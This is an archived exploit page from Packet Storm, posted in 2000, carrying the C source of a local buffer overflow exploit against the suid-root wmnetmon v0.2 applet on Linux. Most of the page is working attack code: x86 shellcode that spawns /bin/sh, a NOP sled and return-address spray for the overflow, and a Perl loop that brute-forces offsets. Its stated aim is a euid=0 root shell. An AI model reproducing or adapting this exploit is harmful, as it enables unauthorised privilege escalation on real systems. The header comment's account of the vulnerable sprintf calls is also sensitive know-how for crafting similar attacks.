what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

wmnetmon_bof.c

wmnetmon_bof.c
Posted Jun 19, 2000
Authored by vade79, realhalo

Wmnetmon v0.2 buffer overflow exploit for Linux - Provides a euid=0 shell provided /usr/X11R6/bin/wmnetmon is suid root, as it is by default. Includes perl script to try all offsets.

tags | exploit, overflow, shell, root, perl
systems | linux
SHA-256 | 86bef23e564b83a03659996407371bf9b0c8902fe578e15b80db3ca10affd2eb

wmnetmon_bof.c

Change Mirror Download
/* (linux+X11)wmnetmon[v0.2+] buffer overflow, by v9[v9@fakehalo.org].  this
will give you a euid=0 shell for the /usr/X11R6/bin/wmnetmon application.
/usr/X11R6/bin/wmnetmon is a monitor for X(a common windowmaker applet),
which is required to be SUID(=4755) root by install.

note: try offsets around -300. you will need to set your DISPLAY env var
correctly for this to evaluate locally(logged in). also, you will notice
wmnetmon say "file not found." when attempting to exploit it, it doesn't
overflow at that point, so don't think it's not vulnerable when it is. :)

test: this was tested on wmnetmon[v0.2p3] in linux. (v0.2+ will work)


this blatant overflow is caused by this(configfile.c):
char configfile[128];
...
sprintf(configfile,"%s",fname);

i also found this while looking at the source, but there is no need to make
two exploits that do the same thing:
char configfile[128];
...
char *homedir=getenv("HOME");
...
sprintf(configfile,"%s/.wmnetmonrc",homedir);


here is the traditional perl script to run offsets (until ctrl-c):

#!/usr/bin/perl
$i=$ARGV[0];
while(1){
print "offset: $i.\n";
system("./wmnetmon_bof $i");
$i+=10; # match the value with the number of no operations if you want.
} */

#define PATH "/usr/X11R6/bin/wmnetmon" // maybe the admin installed elsewhere?
#define DEFAULT_OFFSET -300 // just to make it easy for you. (g)
static char exec[]=
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
"\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff"
"\x2f\x62\x69\x6e\x2f\x73\x68\x01"; // i like hex01.
long esp(void){__asm__("movl %esp,%eax");}
int main(int argc,char **argv){
char bof[142]; // not exact, but who's counting?
int i,offset;
long ret;
if(argc>1){offset=atoi(argv[1]);}
else{offset=DEFAULT_OFFSET;}
ret=(esp()-offset);
for(i=0;i<136;i+=4){*(long *)&bof[i]=ret;}
for(i=0;i<(132-strlen(exec));i++){*(bof+i)=0x90;}
memcpy(bof+i,exec,strlen(exec));
printf("[ return address: 0x%lx(offset=%d), total size: %d(sc=%d). ]\n",ret,offset,strlen(bof),strlen(exec));
if(execlp(PATH,"wmnetmon","-c",bof,0)){
printf("%s: execution failed, maybe %s doesn't exist?\n",argv[0],PATH);
exit(-1);
}
}
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    17 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close